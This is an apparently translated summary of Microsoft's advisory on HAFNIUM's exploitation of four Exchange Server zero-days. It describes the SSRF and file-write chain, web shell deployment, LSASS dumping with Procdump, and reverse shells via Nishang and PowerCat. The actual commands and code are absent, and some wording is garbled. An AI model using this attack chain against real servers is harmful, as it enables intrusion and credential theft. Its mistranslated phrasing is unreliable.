Microsoft has detected multiple zero-day vulnerabilities that can be used to attack the local version of Microsoft Exchange Server. Microsoft attributed the attack to a Group called HAFNIUM. Based on the observed TTP, the assessment believes that the organization is funded by the Chinese government and operates outside of China.
HAFNIUM mainly targets entities in multiple industries in the United States, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and non-governmental organizations.
In this campaign, Microsoft observed HAFNIUM interacting with Office 365 victims. Although they usually cannot successfully compromise customer accounts, this reconnaissance activity can help attackers gather more information about the target environment.
Microsoft provides the following information to help customers understand these vulnerability technologies and be able to more effectively defend against future attacks on unpatched systems:
- CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange, which enables attackers to send arbitrary HTTP requests and authenticate through Exchange Server.
- CVE-2021-26857 is an insecure deserialization vulnerability in the unified messaging service. Insecure deserialization is where an untrusted user can control the data being deserialized by the program. Using this vulnerability, HAFNIUM can run code as SYSTEM on the Exchange server. This requires administrator rights or another vulnerability to be exploited.
- CVE-2021-26858 is an arbitrary file writing vulnerability after authentication in Exchange. If HAFNIUM can authenticate through the Exchange server, they can use this vulnerability to write files to any path on the server. They can authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by destroying the credentials of legitimate administrators.
- CVE-2021-27065 is an arbitrary file writing vulnerability after authentication in Exchange. If HAFNIUM can authenticate through the Exchange server, they can use this vulnerability to write files to any path on the server. They can authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by destroying the credentials of legitimate administrators.
After exploiting the vulnerability to gain initial access, HAFNIUM deployed WebShell on the infected server. WebShell enables attackers to steal data and perform other malicious operations, leading to further harm. The following is an example of a WebShell deployed by HAFNIUM written in ASP:
After deploying WebShell, HAFNIUM performed the following post-infiltration activities:
- Use Procdump to dump the memory of the LSASS process:
- Use 7-Zip to compress the stolen data into a ZIP file for penetration:
- Add and use the Exchange PowerShell snap-in to export mailbox data:
- Use Nishang Invoke-PowerShellTcpOneLine reverse shell:
- Download PowerCat from GitHub, and then use it to open a connection to the remote server:
HAFNIUM operators can also download the Exchange offline address book from the infected system, which contains information about the organization and its users.
WebShells in the following paths:
Exchange Server installation paths:
WebShells file names:
Paths for LSASS dumps: